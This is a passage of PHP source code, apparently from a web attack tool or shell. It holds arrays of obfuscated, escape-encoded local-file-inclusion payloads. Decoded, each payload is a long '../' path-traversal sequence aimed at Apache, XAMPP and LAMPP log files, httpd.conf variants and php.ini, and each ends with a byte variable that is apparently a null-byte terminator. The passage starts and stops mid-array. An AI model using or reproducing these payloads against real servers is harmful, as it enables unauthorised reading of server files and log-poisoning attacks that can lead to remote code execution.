"\x2e\56\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\56\x2e\57\x2e\x2e\57\56\x2e\x2f\56\56\57\x2e\56\57\56\56\x2f\56\56\57\56\x2e\57\56\56\x2f\56\x2e\57\157\160\x74\57\x6c\x61\x6d\160\x70\57\154\x6f\x67\163\x2f\x61\143\143\145\163\x73\x2e\154\157\x67" . $byte1 . '', 23 => "\x2e\x2e\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\x2e\x2e\57\x2e\56\57\56\x2e\57\x2e\56\57\x2e\x2e\57\56\x2e\x2f\x2e\56\57\x2e\x2e\x2f\56\x2e\57\56\x2e\57\157\160\x74\57\170\141\x6d\160\x70\57\x6c\x6f\x67\163\57\x61\x63\x63\x65\163\x73\56\x6c\x6f\x67" . $byte1 . ''); $lfierror = array(1 => "\56\x2e\57\56\56\57\x2e\56\x2f\x2e\56\x2f\56\x2e\57\x2e\x2e\x2f\56\x2e\x2f\56\x2e\x2f\56\56\x2f\56\56\57\56\56\x2f\x2e\x2e\57\56\56\57\x2e\56\57\x61\160\141\143\150\145\57\x6c\157\147\x73\x2f\145\162\x72\157\162\x2e\154\x6f\147" . $byte1 . '', 2 => "\56\x2e\x2f\56\56\x2f\56\x2e\x2f\x2e\56\57\56\56\x2f\x2e\x2e\57\56\x2e\57\x2e\x2e\57\x2e\x2e\57\56\x2e\57\x2e\56\57\x2e\56\57\56\x2e\57\56\56\x2f\145\x74\143\57\150\164\164\160\x64\x2f\154\157\x67\x73\x2f\145\162\x72\157\162\137\154\157\147" . $byte1 . '', 3 => "\56\x2e\57\x2e\56\57\56\56\x2f\x2e\x2e\x2f\56\x2e\57\56\56\x2f\56\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\x2e\57\56\x2e\57\145\164\x63\x2f\x68\164\164\x70\x64\57\154\157\147\x73\57\145\162\x72\157\162\x2e\x6c\157\x67" . $byte1 . '', 4 => "\x2e\56\x2f\x2e\56\57\56\56\57\56\x2e\57\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\x2e\56\57\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\57\x76\141\x72\57\x77\x77\x77\57\154\157\147\x73\57\x65\162\162\x6f\162\x5f\154\157\x67" . $byte1 . '', 5 => "\x2e\x2e\57\x2e\56\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\57\56\56\x2f\56\56\x2f\56\56\x2f\x2e\56\x2f\56\56\57\56\x2e\57\166\x61\162\x2f\x77\167\x77\x2f\154\157\x67\x73\57\145\x72\162\x6f\x72\x2e\154\157\147" . $byte1 . '', 6 => "\56\x2e\57\56\x2e\57\56\x2e\x2f\56\56\57\56\56\57\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\56\x2e\57\165\x73\162\x2f\154\x6f\x63\141\x6c\57\141\x70\141\143\x68\145\x2f\154\157\147\x73\x2f\145\x72\x72\157\x72\137\154\157\x67" . $byte1 . '', 7 => "\56\x2e\57\56\56\57\56\x2e\57\x2e\56\57\56\56\57\x2e\x2e\x2f\x2e\x2e\57\56\56\57\x2e\x2e\57\x2e\56\57\x2e\x2e\57\x2e\56\57\x2e\56\57\x2e\56\x2f\165\163\x72\x2f\154\157\143\141\154\x2f\141\160\x61\143\x68\x65\57\154\x6f\x67\x73\57\x65\x72\x72\157\162\56\154\157\147" . $byte1 . '', 8 => "\56\x2e\x2f\56\x2e\57\x2e\x2e\57\x2e\x2e\57\56\56\57\56\x2e\x2f\x2e\56\57\x2e\56\57\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\56\56\x2f\56\56\57\56\56\57\x76\x61\162\57\154\157\147\x2f\141\160\141\x63\150\145\57\x65\162\162\157\x72\x5f\154\157\147" . $byte1 . '', 9 => "\x2e\56\x2f\x2e\x2e\x2f\x2e\56\57\56\56\57\x2e\56\57\x2e\x2e\x2f\x2e\56\57\x2e\56\57\56\x2e\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\56\x2f\56\x2e\57\x76\141\x72\x2f\154\x6f\147\x2f\x61\160\141\143\150\x65\x32\57\145\162\x72\x6f\162\x5f\154\x6f\147" . $byte1 . '', 10 => "\x2e\x2e\57\56\56\57\56\56\57\x2e\x2e\57\x2e\56\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\x2e\57\56\56\x2f\56\x2e\x2f\56\56\x2f\56\x2e\x2f\56\x2e\57\166\141\x72\x2f\x6c\x6f\x67\57\x61\160\x61\x63\x68\145\57\x65\162\162\157\x72\56\154\157\x67" . $byte1 . '', 11 => "\56\56\x2f\x2e\x2e\57\56\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\x2e\57\x2e\56\x2f\x2e\x2e\x2f\56\x2e\57\x2e\56\x2f\x2e\56\x2f\56\x2e\57\56\56\x2f\56\x2e\x2f\166\141\x72\x2f\154\x6f\147\57\x61\x70\x61\143\150\x65\62\x2f\145\x72\162\157\x72\x2e\154\157\x67" . $byte1 . '', 12 => "\56\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\x2e\57\56\x2e\x2f\x2e\x2e\x2f\56\56\57\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\56\56\x2f\166\x61\162\57\x6c\157\147\57\145\162\x72\157\x72\x5f\154\157\147" . $byte1 . '', 13 => "\x2e\x2e\x2f\x2e\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\x2e\57\x2e\56\57\56\x2e\57\x2e\56\x2f\56\56\x2f\56\x2e\57\x2e\x2e\57\56\56\x2f\x2e\56\57\x76\x61\x72\57\154\157\x67\57\x65\x72\162\x6f\x72\56\x6c\x6f\147" . $byte1 . '', 14 => "\56\56\x2f\56\56\57\56\56\57\56\56\57\56\x2e\x2f\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\56\x2e\57\56\56\57\x2e\56\57\56\56\57\x2e\56\x2f\166\x61\x72\x2f\x6c\157\147\x2f\150\164\164\x70\144\x2f\x65\x72\x72\x6f\x72\x5f\x6c\157\147" . $byte1 . '', 15 => "\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\57\56\56\x2f\56\x2e\x2f\x2e\x2e\57\56\x2e\57\56\56\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\56\56\x2f\56\x2e\57\x61\x70\141\143\x68\x65\62\57\x6c\x6f\x67\x73\x2f\x65\x72\x72\x6f\162\x2e\154\157\x67" . $byte1 . '', 16 => "\56\x2e\57\56\x2e\x2f\x2e\x2e\57\x2e\x2e\57\56\56\57\56\x2e\x2f\x2e\x2e\x2f\56\56\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\56\56\x2f\56\x2e\57\x6c\157\147\163\x2f\145\162\162\x6f\x72\x2e\x6c\x6f\147" . $byte1 . '', 17 => "\56\x2e\x2f\x2e\56\x2f\x2e\56\57\x2e\56\57\56\x2e\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\57\x75\x73\162\57\154\x6f\143\141\x6c\57\x61\160\x61\x63\150\145\x32\57\154\x6f\147\x73\x2f\145\x72\x72\157\x72\137\x6c\157\147" . $byte1 . '', 18 => "\x2e\x2e\57\56\x2e\57\x2e\x2e\57\56\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\165\163\x72\57\x6c\x6f\143\x61\x6c\57\x61\160\141\143\150\145\x32\57\154\x6f\x67\x73\57\x65\x72\162\x6f\x72\x2e\154\x6f\147" . $byte1 . '', 19 => "\56\56\57\56\x2e\57\x2e\x2e\57\x2e\56\57\56\x2e\57\56\56\x2f\x2e\56\57\x2e\56\57\56\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\56\56\x2f\56\x2e\x2f\166\x61\x72\57\x6c\157\147\x2f\150\x74\164\160\144\x2f\x65\162\162\157\x72\56\154\x6f\x67" . $byte1 . '', 20 => "\56\x2e\x2f\56\56\57\56\x2e\x2f\x2e\56\57\x2e\56\57\56\56\x2f\x2e\56\x2f\56\56\57\x2e\x2e\57\56\56\x2f\56\56\57\56\56\57\56\56\x2f\56\x2e\57\x6f\160\164\x2f\x6c\141\155\x70\160\x2f\x6c\x6f\x67\x73\x2f\145\x72\x72\157\x72\x5f\154\x6f\147" . $byte1 . '', 21 => "\56\56\x2f\56\56\x2f\56\x2e\57\56\56\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\56\56\x2f\x2e\56\57\x2e\56\57\x2e\56\57\56\x2e\57\56\56\x2f\x2e\x2e\x2f\157\160\164\57\170\x61\155\160\x70\x2f\x6c\157\147\163\57\145\162\162\157\162\137\154\x6f\147" . $byte1 . '', 22 => "\x2e\56\57\56\x2e\57\x2e\x2e\x2f\56\56\57\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\56\57\x2e\56\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\x2f\157\160\164\57\x6c\141\155\x70\x70\57\x6c\x6f\x67\x73\57\145\162\x72\x6f\x72\56\154\157\147" . $byte1 . '', 23 => "\56\56\57\56\56\57\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\56\x2f\x2e\x2e\57\56\56\57\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\x2e\56\x2f\x6f\x70\x74\57\x78\x61\155\160\x70\57\x6c\x6f\x67\x73\x2f\x65\x72\x72\x6f\162\x2e\x6c\x6f\147" . $byte1 . ''); $lficonfig = array(1 => "\x2e\x2e\57\56\x2e\x2f\x2e\56\57\56\56\57\x2e\x2e\x2f\x2e\56\57\56\x2e\57\x2e\56\x2f\x2e\x2e\57\56\56\57\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\56\x2e\57\56\x2e\x2f\x75\x73\x72\x2f\154\157\x63\x61\154\57\141\x70\141\x63\x68\x65\x2f\x63\157\156\146\57\150\x74\164\x70\x64\x2e\x63\x6f\156\x66" . $byte1 . '', 2 => "\56\56\57\x2e\56\57\x2e\x2e\57\56\56\57\56\56\x2f\56\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\56\x2f\56\56\x2f\x2e\x2e\57\x2e\56\57\x2e\56\x2f\56\x2e\57\x75\163\162\x2f\x6c\x6f\x63\141\154\x2f\x61\160\141\x63\150\x65\62\57\143\157\x6e\146\x2f\x68\x74\x74\160\x64\x2e\143\x6f\156\x66" . $byte1 . '', 3 => "\x2e\x2e\x2f\56\x2e\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\56\56\57\x2e\56\x2f\56\x2e\x2f\56\56\57\56\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\56\56\x2f\56\x2e\57\x2e\56\x2f\x65\x74\x63\57\x68\x74\x74\160\144\57\143\157\156\146\57\x68\164\164\x70\x64\56\x63\157\156\146" . $byte1 . '', 4 => "\56\56\57\x2e\x2e\57\56\56\57\56\56\57\x2e\56\x2f\56\56\57\x2e\56\x2f\56\x2e\57\56\x2e\57\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\56\57\x2e\x2e\57\145\x74\x63\57\141\160\141\x63\150\x65\x2f\x63\x6f\156\146\x2f\x68\x74\x74\x70\144\x2e\143\x6f\x6e\146" . $byte1 . '', 5 => "\56\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\56\x2f\56\56\x2f\x2e\x2e\57\x2e\56\57\56\x2e\57\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\x2e\x2e\57\x2e\56\57\56\56\57\x75\x73\162\57\154\x6f\143\x61\x6c\57\x65\x74\x63\57\141\x70\141\143\x68\x65\x2f\x63\157\x6e\146\x2f\150\164\x74\160\144\56\x63\x6f\156\x66" . $byte1 . '', 6 => "\x2e\x2e\57\56\56\57\56\56\57\x2e\56\x2f\56\56\57\56\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\56\x2f\x2e\56\57\56\56\x2f\x2e\56\x2f\56\x2e\x2f\56\56\57\x65\x74\x63\57\141\x70\141\143\150\x65\x32\x2f\x68\164\x74\x70\144\56\x63\157\156\x66" . $byte1 . '', 7 => "\x2e\x2e\57\56\56\x2f\x2e\x2e\x2f\56\x2e\57\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\57\x2e\56\x2f\56\x2e\57\165\163\x72\x2f\x6c\x6f\x63\141\x6c\57\141\x70\x61\x63\x68\145\57\x68\x74\x74\x70\x64\56\143\157\x6e\146" . $byte1 . '', 8 => "\56\x2e\x2f\x2e\56\57\x2e\56\57\x2e\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\56\x2e\57\56\56\57\x2e\x2e\57\56\56\57\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\57\165\163\162\x2f\154\x6f\x63\x61\154\x2f\141\160\x61\143\x68\x65\x32\57\150\x74\164\160\144\56\143\x6f\156\146" . $byte1 . '', 9 => "\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\x2e\x2e\57\x2e\x2e\57\56\x2e\x2f\56\x2e\57\56\56\57\56\x2e\57\56\56\x2f\56\x2e\57\56\56\x2f\x2e\x2e\57\56\x2e\x2f\165\163\162\57\154\157\143\141\x6c\x2f\x68\164\164\160\x64\x2f\x63\x6f\x6e\146\x2f\150\x74\164\160\144\56\143\x6f\156\146" . $byte1 . '', 10 => "\56\x2e\x2f\x2e\56\x2f\x2e\56\57\56\56\57\56\56\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\56\x2f\x2e\56\x2f\x75\x73\162\57\154\157\x63\141\x6c\57\x65\164\x63\x2f\x61\x70\141\x63\150\x65\62\57\x63\x6f\x6e\146\57\x68\x74\x74\160\x64\x2e\143\x6f\156\146" . $byte1 . '', 11 => "\x2e\x2e\x2f\56\56\x2f\x2e\56\57\56\56\57\56\56\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\57\x2e\56\57\56\56\57\x2e\56\x2f\x2e\x2e\57\165\163\162\x2f\x6c\157\143\141\154\57\x65\164\143\x2f\150\164\164\x70\144\x2f\x63\x6f\156\146\x2f\x68\164\164\160\144\56\143\x6f\x6e\146" . $byte1 . '', 12 => "\56\56\x2f\56\x2e\x2f\x2e\56\x2f\56\56\x2f\56\56\57\56\56\x2f\56\56\57\x2e\56\57\x2e\56\57\x2e\56\x2f\x2e\x2e\57\x2e\56\57\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\141\160\141\143\150\x65\62\57\143\x6f\x6e\x66\57\x68\x74\164\160\144\x2e\x63\x6f\156\x66" . $byte1 . '', 13 => "\56\56\57\x2e\56\57\56\56\57\56\56\57\56\x2e\x2f\56\56\x2f\56\x2e\x2f\56\x2e\57\56\56\x2f\56\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\56\x2f\165\x73\x72\x2f\x61\160\141\x63\150\145\x2f\143\x6f\156\146\57\150\164\x74\160\144\x2e\x63\157\x6e\146" . $byte1 . '', 14 => "\56\56\57\56\x2e\x2f\x2e\56\x2f\x2e\56\57\56\x2e\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\57\56\x2e\57\56\56\57\56\56\x2f\x2e\56\57\165\x73\162\57\154\157\x63\141\154\x2f\x61\x70\x70\163\57\x61\160\141\x63\150\x65\x32\57\143\157\156\x66\57\x68\164\164\x70\x64\x2e\143\157\156\146" . $byte1 . '', 15 => "\x2e\x2e\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\56\x2e\57\x2e\56\57\56\56\x2f\x2e\56\57\56\56\57\x2e\x2e\x2f\x2e\x2e\57\56\56\57\x2e\x2e\57\x2e\x2e\57\56\56\57\x75\163\162\57\x6c\157\143\141\154\57\x61\160\x70\x73\57\141\160\141\x63\x68\x65\x2f\x63\157\156\x66\x2f\x68\164\164\160\x64\56\x63\157\156\146" . $byte1 . '', 16 => "\56\x2e\57\56\x2e\57\56\x2e\x2f\x2e\56\x2f\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\56\x2f\56\x2e\x2f\x2e\x2e\57\56\56\57\x2e\56\x2f\x2e\56\57\x2e\x2e\57\x65\164\143\57\141\160\141\143\150\145\62\57\x63\157\x6e\x66\57\x68\x74\164\x70\144\56\143\157\x6e\x66" . $byte1 . '', 17 => "\x2e\56\57\56\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\56\x2f\56\56\57\56\56\x2f\x2e\x2e\57\56\56\x2f\56\56\57\56\x2e\57\56\56\x2f\56\x2e\x2f\145\x74\143\x2f\x68\x74\x74\160\x2f\x63\x6f\x6e\x66\x2f\x68\164\164\x70\x64\56\143\157\156\x66" . $byte1 . '', 18 => "\x2e\56\57\56\x2e\x2f\56\x2e\57\56\56\x2f\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\56\x2e\57\56\56\57\x2e\x2e\57\x2e\56\57\56\56\x2f\56\56\x2f\x2e\x2e\x2f\56\x2e\57\x65\164\x63\57\150\164\164\x70\x64\x2f\x68\x74\x74\x70\144\x2e\x63\157\156\146" . $byte1 . '', 19 => "\x2e\56\x2f\x2e\x2e\57\56\56\57\56\56\57\x2e\56\x2f\x2e\56\x2f\56\56\x2f\x2e\x2e\57\x2e\56\x2f\56\x2e\x2f\56\x2e\57\56\x2e\57\56\x2e\x2f\56\x2e\x2f\x2e\56\57\145\x74\143\57\x68\164\x74\x70\x2f\150\164\164\x70\144\56\143\157\x6e\x66" . $byte1 . '', 20 => "\56\x2e\57\56\56\57\56\x2e\x2f\56\56\x2f\56\56\x2f\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\56\56\x2f\x2e\56\57\x2e\56\57\56\x2e\x2f\56\56\x2f\x2e\x2e\57\56\x2e\x2f\x65\164\x63\x2f\150\x74\164\160\144\x2e\143\x6f\156\x66" . $byte1 . '', 21 => "\x2e\x2e\x2f\56\56\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\56\56\x2f\56\x2e\57\56\56\x2f\56\56\x2f\56\56\x2f\157\x70\x74\57\141\160\141\x63\150\145\57\x63\157\x6e\146\x2f\150\164\164\x70\144\56\143\157\156\x66" . $byte1 . '', 22 => "\56\56\57\56\56\57\x2e\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\56\x2f\x2e\56\57\x2e\x2e\57\x2e\x2e\57\56\56\57\x2e\x2e\x2f\x2e\56\57\56\56\x2f\x2e\x2e\x2f\x2e\56\57\157\x70\x74\57\141\160\141\x63\150\145\62\x2f\143\x6f\156\146\x2f\x68\164\164\160\144\x2e\x63\x6f\156\x66" . $byte1 . '', 23 => "\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\56\x2f\56\56\57\x2e\56\57\x2e\56\57\56\56\x2f\x2e\56\x2f\56\x2e\57\x2e\x2e\x2f\56\x2e\x2f\56\x2e\x2f\56\56\57\166\x61\162\x2f\x77\167\x77\x2f\143\x6f\x6e\x66\x2f\x68\x74\x74\160\144\56\x63\157\x6e\x66" . $byte1 . '', 24 => "\56\x2e\x2f\56\x2e\57\x2e\56\x2f\x2e\x2e\x2f\56\x2e\57\56\x2e\57\56\56\x2f\56\56\x2f\56\56\57\x2e\56\x2f\x2e\x2e\57\56\x2e\57\56\56\x2f\56\x2e\x2f\56\56\57\x70\x72\151\x76\141\164\145\57\x65\164\143\57\x68\x74\x74\x70\144\x2f\150\x74\164\x70\144\x2e\143\157\x6e\x66" . $byte1 . '', 25 => "\x2e\56\57\56\56\x2f\56\56\x2f\x2e\56\x2f\x2e\x2e\57\x2e\56\x2f\56\56\57\56\x2e\x2f\x2e\56\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\56\x2f\x2e\x2e\x2f\x70\162\151\x76\141\x74\145\57\x65\164\x63\57\x68\164\164\x70\144\x2f\150\x74\x74\160\x64\x2e\x63\157\x6e\x66\56\x64\145\146\x61\x75\x6c\164" . $byte1 . '', 26 => "\56\x2e\57\x2e\x2e\x2f\56\56\x2f\56\x2e\x2f\56\56\57\x2e\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\x2e\57\56\x2e\x2f\x2e\56\x2f\56\x2e\x2f\x2e\56\57\56\56\57\x2e\56\57\126\157\x6c\x75\155\x65\163\x2f\167\x65\x62\102\x61\143\x6b\x75\x70\57\x6f\160\x74\57\141\x70\x61\143\x68\x65\x32\57\x63\157\x6e\x66\x2f\x68\164\164\x70\144\x2e\x63\x6f\156\x66" . $byte1 . '', 27 => "\56\x2e\x2f\x2e\56\57\x2e\x2e\x2f\56\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\56\56\x2f\x2e\56\57\56\56\57\56\x2e\x2f\x2e\x2e\x2f\56\56\x2f\x2e\56\57\56\x2e\57\x56\x6f\154\x75\155\x65\x73\57\167\x65\142\x42\141\x63\153\165\x70\x2f\x70\162\151\166\x61\164\145\57\145\x74\143\x2f\150\164\x74\x70\144\x2f\150\x74\x74\x70\x64\56\143\x6f\156\x66" . $byte1 . '', 28 => "\x2e\56\57\x2e\56\57\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\56\57\56\56\x2f\56\56\x2f\x2e\56\x2f\56\x2e\57\56\56\x2f\56\56\x2f\x56\157\154\165\155\x65\163\x2f\x77\x65\x62\102\x61\143\x6b\165\x70\x2f\160\162\151\166\x61\x74\145\57\x65\164\143\x2f\x68\164\x74\160\x64\57\x68\164\164\160\x64\x2e\x63\x6f\156\x66\x2e\x64\x65\x66\141\165\x6c\x74" . $byte1 . '', 29 => "\56\56\x2f\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\56\56\x2f\x2e\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\56\56\57\x2e\x2e\57\56\x2e\57\x2e\56\x2f\56\x2e\x2f\x2e\x2e\57\x75\x73\x72\57\154\157\143\x61\x6c\x2f\160\x68\x70\x2f\150\x74\x74\160\144\x2e\143\157\156\146\x2e\x70\150\160" . $byte1 . '', 30 => "\x2e\56\57\56\x2e\57\x2e\56\57\x2e\56\57\56\56\x2f\56\x2e\57\56\x2e\57\56\56\57\56\x2e\57\56\56\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\x2f\56\x2e\57\165\163\162\x2f\154\x6f\143\141\154\57\x70\150\160\x34\x2f\150\164\x74\160\x64\x2e\143\x6f\x6e\146\56\160\150\160" . $byte1 . '', 31 => "\x2e\56\57\x2e\56\57\x2e\56\x2f\x2e\x2e\x2f\56\x2e\57\56\x2e\57\56\56\x2f\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\57\x2e\x2e\57\x2e\x2e\57\56\56\x2f\x75\x73\162\x2f\154\x6f\x63\141\x6c\x2f\x70\150\x70\x35\x2f\150\164\x74\x70\x64\56\x63\x6f\156\146\x2e\160\x68\x70" . $byte1 . '', 32 => "\x2e\56\57\56\x2e\57\x2e\56\57\x2e\56\57\56\x2e\57\56\x2e\x2f\56\56\57\56\56\x2f\x2e\56\x2f\56\56\x2f\56\x2e\57\x2e\x2e\57\56\56\57\56\56\x2f\56\x2e\57\x75\163\x72\x2f\154\157\143\141\154\x2f\160\x68\160\x2f\150\164\x74\160\144\56\x63\157\156\x66" . $byte1 . '', 33 => "\x2e\56\x2f\56\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\56\56\x2f\x2e\56\x2f\x2e\56\57\56\x2e\x2f\x2e\56\x2f\56\x2e\57\x2e\x2e\x2f\56\56\57\x2e\x2e\x2f\165\163\x72\57\154\x6f\x63\x61\x6c\x2f\160\150\x70\64\x2f\150\164\164\160\x64\56\x63\x6f\x6e\146" . $byte1 . '', 34 => "\56\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\x2e\x2f\56\x2e\x2f\x2e\56\x2f\56\56\x2f\x2e\56\57\56\x2e\57\x2e\56\x2f\56\56\57\x2e\56\57\56\x2e\x2f\56\x2e\x2f\56\x2e\x2f\x75\163\162\57\154\157\x63\141\x6c\x2f\x70\150\160\65\57\150\164\x74\x70\144\56\x63\157\156\146" . $byte1 . '', 35 => "\x2e\56\57\56\x2e\57\x2e\56\x2f\56\x2e\x2f\x2e\x2e\57\56\x2e\57\x2e\x2e\57\x2e\56\x2f\56\56\57\x2e\x2e\x2f\x2e\56\57\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\x2e\56\57\165\163\x72\x2f\154\157\x63\x61\154\57\x65\x74\143\x2f\141\160\141\143\150\x65\x2f\x76\150\157\x73\x74\163\56\143\157\x6e\146" . $byte1 . ''); $lfiphpini = array(1 => "\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\56\x2f\56\x2e\57\x2e\56\x2f\56\56\x2f\56\56\57\x2e\56\57\56\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\56\x2f\x2e\56\57\145\x74\143\57\x70\150\160\56\151\156\151" . $byte1 . '', 2 => "\x2e\56\57\x2e\56\57\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\56\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\57\56\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\56\56\57\142\151\x6e\57\x70\x68\x70\x2e\151\156\151" . $byte1 . '', 3 => "\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\56\x2e\57\x2e\56\x2f\x2e\56\x2f\56\56\57\56\56\x2f\56\56\x2f\56\x2e\57\x2e\56\57\x2e\56\x2f\56\56\57\145\164\143\57\150\164\x74\x70\144\57\160\150\160\56\x69\156\151" . $byte1 . '', 4 => "\x2e\x2e\x2f\x2e\x2e\57\56\x2e\57\56\56\57\56\56\x2f\x2e\56\57\x2e\x2e\57\56\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\57\56\x2e\57\x2e\x2e\x2f\56\x2e\x2f\165\163\x72\57\x6c\151\142\57\160\x68\160\x2e\151\156\x69" . $byte1 . '', 5 => "\x2e\56\x2f\56\56\x2f\56\56\x2f\x2e\56\57\56\56\x2f\56\56\x2f\x2e\x2e\x2f\56\x2e\x2f\56\x2e\57\x2e\56\57\x2e\56\57\56\56\x2f\56\56\57\56\56\x2f\56\x2e\57\x75\x73\162\x2f\x6c\151\142\57\160\x68\x70\57\160\x68\x70\x2e\151\156\x69" . $byte1 . '', 6 => "\56\56\x2f\56\x2e\x2f\x2e\56\x2f\x2e\56\57\56\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\x2e\57\56\56\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\57\56\x2e\x2f\x2e\x2e\x2f\56\56\57\165\163\162\x2f\x6c\x6f\x63\141\x6c\57\x65\x74\143\57\x70\150\x70\56\x69\x6e\151" . $byte1 . '', 7 => "\x2e\56\57\x2e\56\57\x2e\56\57\56\56\57\x2e\x2e\57\56\x2e\57\x2e\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\56\57\56\56\x2f\x2e\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x75\163\x72\57\x6c\x6f\143\x61\154\57\x6c\151\142\57\160\x68\x70\x2e\151\x6e\151" . $byte1 . '', 8 => "\x2e\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\56\x2f\56\x2e\57\56\56\x2f\56\x2e\x2f\x2e\56\57\x2e\56\57\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\x75\x73\x72\57\154\157\143\x61\x6c\x2f\160\x68\x70\x2f\x6c\x69\142\x2f\x70\x68\160\56\x69\x6e\151" . $byte1 . '', 9 => "\56\56\x2f\x2e\x2e\x2f\56\56\x2f\x2e\x2e\x2f\56\x2e\57\56\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\57\x2e\56\57\56\56\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\x2e\56\57\165\163\x72\x2f\x6c\x6f\x63\x61\x6c\57\x70\x68\160\64\x2f\x6c\x69\142\x2f\160\150\160\x2e\151\x6e\151" . $byte1 . '', 10 => 